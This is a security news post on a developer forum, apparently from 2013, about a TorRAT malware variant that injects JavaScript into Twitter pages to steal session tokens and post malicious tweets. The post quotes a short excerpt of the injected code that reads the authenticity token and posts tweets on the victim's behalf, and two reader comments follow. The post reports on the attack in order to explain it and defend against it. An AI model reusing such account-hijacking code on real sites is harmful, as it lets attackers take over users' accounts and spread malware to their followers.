Javascript Twitter injection launches Man-in-the-Browser attacks

11 Years Ago happygeek 2 384 Views

Dana Tamir, Enterprise Security Director for Trusteer has recently uncovered a variation of the TorRAT banking data malware which has been actively configured to target Twitter users. The attack works by "injecting Javascript code into the victim’s Twitter account page" Tamir says, adding that the malware "collects the user’s authentication token, which enables it to make authorized calls to Twitter's APIs, and then posts new, malicious tweets on behalf of the victim". These tweets are used, of course, to spread the malware within the social networking circle by leveraging the trust that is implicit in such networks. Twitter users, generally speaking, follow people and accounts that they trust. When these accounts are compromised by such an attack it becomes quite easy to persuade followers to click through to drive-by-malware pages, simply courtesy of the level of implied trust invested in the original poster.

At the moment this particular attack seems to be confined to the Dutch market, with tweets saying such things as ""Onze nieuwe koning Willem gaat nog meer verdienen dan beatrix. check zijn salaris" which roughly translates to "Our new King William will earn even more than Beatrix. Check his salary" and contains a malicious link.
Of course, the attack vector will most likely soon change as other groups adopt the methodology and adapt the code accordingly.

Dana Tamir provided an excerpt from that injected Javascript code to highlight what is being done:

function _PostTweet() {
        var a = $('input[name="authenticity_token"]').val();
        a.length > 0 && $.post("/i/tweet/create", {
            authenticity_token: a,
            place_id: "",
            status: _GetRndMsg()
        }).always(function () {
            ar[0].msgsent = 1, SetO(), window.location.href = window.location.href
        })
    }

Trusteer advises that enterprise exploit prevention technology, preventing vulnerable endpoint user applications (browser clients) from being exploited and malware downloaded and executed, is the best way stop such attacks dead. "External sources like web content and email attachments, which can include a hidden exploit in the form of embedded code, should never be trusted" Trusteer says "Such content should only be opened while monitoring the application state to ensure it is operating legitimately".

LastMitch

11 Years Ago

At the moment this particular attack seems to be confined to the Dutch market, with tweets saying such things as ""Onze nieuwe koning Willem gaat nog meer verdienen dan beatrix. check zijn salaris" which roughly translates to "Our new King William will earn even more than Beatrix. Check his salary" and contains a malicious link.

This sound like an isolated incident maybe not if it starts spreading but it's good to know. So I can be aware with this javascript code.

Not sure why they used this phrase:

Our new King William will earn even more than Beatrix. Check his salary

What the meaning behind it.

To me it meant

Wee kin william will earn even mooar than beytrix. check 'is salary

Edited 11 Years Ago by LastMitch because: grammer

diafol

11 Years Ago

Interesting. But how does the js get into a stored post in the first place? How is the script injected? I can understand that the js code is sent to the server, but doesn't Twitter screen and strip any possible malicious code?

Reply to this topic

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.